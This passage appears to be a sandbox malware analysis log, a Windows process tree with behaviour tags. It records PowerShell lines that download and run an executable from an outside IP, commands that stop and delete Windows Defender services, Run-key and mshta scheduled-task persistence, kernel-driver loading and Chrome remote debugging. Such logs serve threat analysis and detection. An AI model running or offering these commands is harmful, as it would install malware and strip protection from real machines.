C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 88013⤵
- Program crash
PID:18848
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3052 -s 92012⤵
- Program crash
PID:18984
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\f379r" & exit10⤵PID:24464
-
C:\Windows\SysWOW64\timeout.exetimeout /t 1111⤵
- Delays execution with timeout.exe
PID:19684
C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe"C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4708 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"9⤵PID:908
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"9⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4396
C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2996 -
C:\Users\Admin\AppData\Local\Temp\is-GKS5B.tmp\Bell_Setup16.tmp"C:\Users\Admin\AppData\Local\Temp\is-GKS5B.tmp\Bell_Setup16.tmp" /SL5="$1101F8,1695194,421888,C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"9⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5172 -
C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe" /VERYSILENT10⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5636 -
C:\Users\Admin\AppData\Local\Temp\is-2433N.tmp\Bell_Setup16.tmp"C:\Users\Admin\AppData\Local\Temp\is-2433N.tmp\Bell_Setup16.tmp" /SL5="$90060,1695194,421888,C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe" /VERYSILENT11⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:4008 -
C:\Windows\SysWOW64\regsvr32.exe"regsvr32.exe" /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\\1wlanapi.ocx"12⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5760 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\1wlanapi.ocx\"' }) { exit 0 } else { exit 1 }"13⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3996
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe"PowerShell.exe" -NoProfile -NonInteractive -Command -13⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3404 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV114⤵PID:3248
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\1wlanapi.ocx\"' }) { exit 0 } else { exit 1 }"13⤵
- Command and Scripting Interpreter: PowerShell
PID:2032
C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe"C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe"8⤵PID:3564
-
C:\Users\Admin\AppData\Local\Temp\SysUpdate\bot.exeC:\Users\Admin\AppData\Local\Temp\SysUpdate\bot.exe9⤵PID:7660
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe10⤵PID:4028
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe11⤵PID:7348
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe12⤵PID:7596
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe13⤵PID:1616
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe14⤵PID:7772
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe15⤵PID:7912
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe16⤵PID:6308
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe17⤵PID:7948
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe18⤵PID:8096
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe19⤵PID:1872
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe20⤵PID:6596
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe21⤵PID:4604
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe22⤵PID:6680
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe23⤵PID:6708
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe24⤵PID:6764
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe25⤵PID:6832
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe26⤵PID:6876
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe27⤵PID:6952
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe28⤵PID:7020
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe29⤵PID:7100
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe30⤵PID:5668
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe31⤵PID:4068
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe32⤵PID:5428
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe33⤵PID:1848
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe34⤵PID:7272
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe35⤵PID:7332
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe36⤵PID:7288
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe37⤵PID:7436
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe38⤵PID:4028
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe39⤵PID:7532
-
C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exeC:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe40⤵PID:4796
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe41⤵PID:3724
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe42⤵PID:4640
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe43⤵PID:7820
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe44⤵PID:7940
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe45⤵PID:5596
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe46⤵PID:8040
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe47⤵PID:6372
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe48⤵PID:5052
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaruntime.exe"49⤵
- Modifies registry key
PID:4912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaruntime.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe\"'"49⤵
- Command and Scripting Interpreter: PowerShell
PID:1816
C:\Users\Admin\AppData\Local\Temp\10043020101\jokererer.exe"C:\Users\Admin\AppData\Local\Temp\10043020101\jokererer.exe"8⤵PID:212
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"9⤵PID:5548
C:\Users\Admin\AppData\Local\Temp\10043810101\297cff0654.exe"C:\Users\Admin\AppData\Local\Temp\10043810101\297cff0654.exe"8⤵PID:4352
-
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10043810101\297cff0654.exe"9⤵PID:7272
C:\Users\Admin\AppData\Local\Temp\10043820101\53ec6f7213.exe"C:\Users\Admin\AppData\Local\Temp\10043820101\53ec6f7213.exe"8⤵PID:6916
-
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10043820101\53ec6f7213.exe"9⤵PID:18712
C:\Users\Admin\AppData\Local\Temp\10367460101\apple.exe"C:\Users\Admin\AppData\Local\Temp\10367460101\apple.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:116 -
C:\Users\Admin\AppData\Local\Temp\22.exe"C:\Users\Admin\AppData\Local\Temp\22.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:6020 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\DBBA.tmp\DBBB.tmp\DBBC.bat C:\Users\Admin\AppData\Local\Temp\22.exe"8⤵
- Suspicious use of WriteProcessMemory
PID:3104 -
C:\Users\Admin\AppData\Local\Temp\22.exe"C:\Users\Admin\AppData\Local\Temp\22.exe" go9⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1224 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\DCC3.tmp\DCC4.tmp\DCC5.bat C:\Users\Admin\AppData\Local\Temp\22.exe go"10⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:5800 -
C:\Windows\system32\sc.exesc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"11⤵
- Launches sc.exe
PID:4552
C:\Windows\system32\sc.exesc start ddrver11⤵
- Launches sc.exe
PID:2580
C:\Windows\system32\timeout.exetimeout /t 111⤵
- Delays execution with timeout.exe
PID:3556
C:\Windows\system32\sc.exesc stop ddrver11⤵
- Launches sc.exe
PID:3240
C:\Windows\system32\sc.exesc start ddrver11⤵
- Launches sc.exe
PID:4748
C:\Windows\system32\takeown.exetakeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y11⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1192
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t11⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5496
C:\Windows\system32\sc.exesc stop "WinDefend"11⤵
- Launches sc.exe
PID:1964
C:\Windows\system32\sc.exesc delete "WinDefend"11⤵
- Launches sc.exe
PID:2360
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f11⤵PID:2912
C:\Windows\system32\sc.exesc stop "MDCoreSvc"11⤵
- Launches sc.exe
PID:3928
C:\Windows\system32\sc.exesc delete "MDCoreSvc"11⤵
- Launches sc.exe
PID:4776
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f11⤵PID:4260
C:\Windows\system32\sc.exesc stop "WdNisSvc"11⤵
- Launches sc.exe
PID:2112
C:\Windows\system32\sc.exesc delete "WdNisSvc"11⤵
- Launches sc.exe
PID:5512
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f11⤵PID:6044
C:\Windows\system32\sc.exesc stop "Sense"11⤵
- Launches sc.exe
PID:2040
C:\Windows\system32\sc.exesc delete "Sense"11⤵
- Launches sc.exe
PID:3764
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\Sense" /f11⤵PID:4896
C:\Windows\system32\sc.exesc stop "wscsvc"11⤵
- Launches sc.exe
PID:4948
C:\Windows\system32\sc.exesc delete "wscsvc"11⤵
- Launches sc.exe
PID:3004
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f11⤵
- Modifies security service
PID:3568
C:\Windows\system32\sc.exesc stop "SgrmBroker"11⤵
- Launches sc.exe
PID:4912
C:\Windows\system32\sc.exesc delete "SgrmBroker"11⤵
- Launches sc.exe
PID:848
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f11⤵PID:5784
C:\Windows\system32\sc.exesc stop "SecurityHealthService"11⤵
- Launches sc.exe
PID:5100
C:\Windows\system32\sc.exesc delete "SecurityHealthService"11⤵
- Launches sc.exe
PID:4732
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f11⤵PID:1076
C:\Windows\system32\sc.exesc stop "webthreatdefsvc"11⤵
- Launches sc.exe
PID:3400
C:\Windows\system32\sc.exesc delete "webthreatdefsvc"11⤵
- Launches sc.exe
PID:844
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f11⤵PID:4540
C:\Windows\system32\sc.exesc stop "webthreatdefusersvc"11⤵
- Launches sc.exe
PID:5680
C:\Windows\system32\sc.exesc delete "webthreatdefusersvc"11⤵
- Launches sc.exe
PID:2796
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f11⤵PID:1012
C:\Windows\system32\sc.exesc stop "WdNisDrv"11⤵
- Launches sc.exe
PID:2744
C:\Windows\system32\sc.exesc delete "WdNisDrv"11⤵
- Launches sc.exe
PID:4908
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f11⤵PID:5376
C:\Windows\system32\sc.exesc stop "WdBoot"11⤵
- Launches sc.exe
PID:548
C:\Windows\system32\sc.exesc delete "WdBoot"11⤵
- Launches sc.exe
PID:852
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f11⤵PID:5060
C:\Windows\system32\sc.exesc stop "WdFilter"11⤵
- Launches sc.exe
PID:1680
C:\Windows\system32\sc.exesc delete "WdFilter"11⤵
- Launches sc.exe
PID:5888
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f11⤵PID:5864
C:\Windows\system32\sc.exesc stop "SgrmAgent"11⤵
- Launches sc.exe
PID:2840
C:\Windows\system32\sc.exesc delete "SgrmAgent"11⤵
- Launches sc.exe
PID:1188
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f11⤵PID:712
C:\Windows\system32\sc.exesc stop "MsSecWfp"11⤵
- Launches sc.exe
PID:3460
C:\Windows\system32\sc.exesc delete "MsSecWfp"11⤵
- Launches sc.exe
PID:2592
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f11⤵PID:5504
C:\Windows\system32\sc.exesc stop "MsSecFlt"11⤵
- Launches sc.exe
PID:5024
C:\Windows\system32\sc.exesc delete "MsSecFlt"11⤵
- Launches sc.exe
PID:1892
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f11⤵PID:1372
C:\Windows\system32\sc.exesc stop "MsSecCore"11⤵
- Launches sc.exe
PID:5468
C:\Windows\system32\sc.exesc delete "MsSecCore"11⤵
- Launches sc.exe
PID:5772
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f11⤵PID:5824
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f11⤵PID:3520
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f11⤵PID:5768
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f11⤵PID:5664
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f11⤵PID:3416
C:\Windows\system32\sc.exesc stop ddrver11⤵
- Launches sc.exe
PID:2420
C:\Windows\system32\sc.exesc delete ddrver11⤵
- Launches sc.exe
PID:2948
C:\Users\Admin\AppData\Local\Temp\10367620101\accde9cdf4.exe"C:\Users\Admin\AppData\Local\Temp\10367620101\accde9cdf4.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3108 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn yIiflmaurRH /tr "mshta C:\Users\Admin\AppData\Local\Temp\6ImH8ZvBV.hta" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
PID:4008 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn yIiflmaurRH /tr "mshta C:\Users\Admin\AppData\Local\Temp\6ImH8ZvBV.hta" /sc minute /mo 25 /ru "Admin" /f8⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2160
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\6ImH8ZvBV.hta7⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:2476 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'SX03FLWS9IV2JSS9DHFTQLNKT5ULF20K.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1436 -
C:\Users\Admin\AppData\Local\TempSX03FLWS9IV2JSS9DHFTQLNKT5ULF20K.EXE"C:\Users\Admin\AppData\Local\TempSX03FLWS9IV2JSS9DHFTQLNKT5ULF20K.EXE"9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4888
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10367630121\am_no.cmd" "6⤵
- System Location Discovery: System Language Discovery
PID:2112 -
C:\Windows\SysWOW64\timeout.exetimeout /t 27⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:3764
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:808 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6116
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:2152 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1892
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:228 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3624
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "I46PkmaDWJp" /tr "mshta \"C:\Temp\ESZPJoGnb.hta\"" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3544
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\ESZPJoGnb.hta"7⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:868 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3536 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1532
C:\Users\Admin\AppData\Local\Temp\10367950101\202a17038f.exe"C:\Users\Admin\AppData\Local\Temp\10367950101\202a17038f.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2284
C:\Users\Admin\AppData\Local\Temp\10367960101\d291a068d0.exe"C:\Users\Admin\AppData\Local\Temp\10367960101\d291a068d0.exe"6⤵PID:4460
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""7⤵
- Uses browser remote debugging
PID:2208 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x84,0xfc,0x100,0xd8,0x104,0x7ffe3016dcf8,0x7ffe3016dd04,0x7ffe3016dd108⤵PID:3884
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1768,i,9514024906106689169,18339160876125645351,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2120 /prefetch:38⤵PID:4820
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2092,i,9514024906106689169,18339160876125645351,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2088 /prefetch:28⤵PID:3480
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2304,i,9514024906106689169,18339160876125645351,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2312 /prefetch:88⤵PID:3104
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2980,i,9514024906106689169,18339160876125645351,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2996 /prefetch:18⤵
- Uses browser remote debugging
PID:5624
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3000,i,9514024906106689169,18339160876125645351,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3028 /prefetch:18⤵
- Uses browser remote debugging
PID:4276
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4212,i,9514024906106689169,18339160876125645351,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4228 /prefetch:28⤵
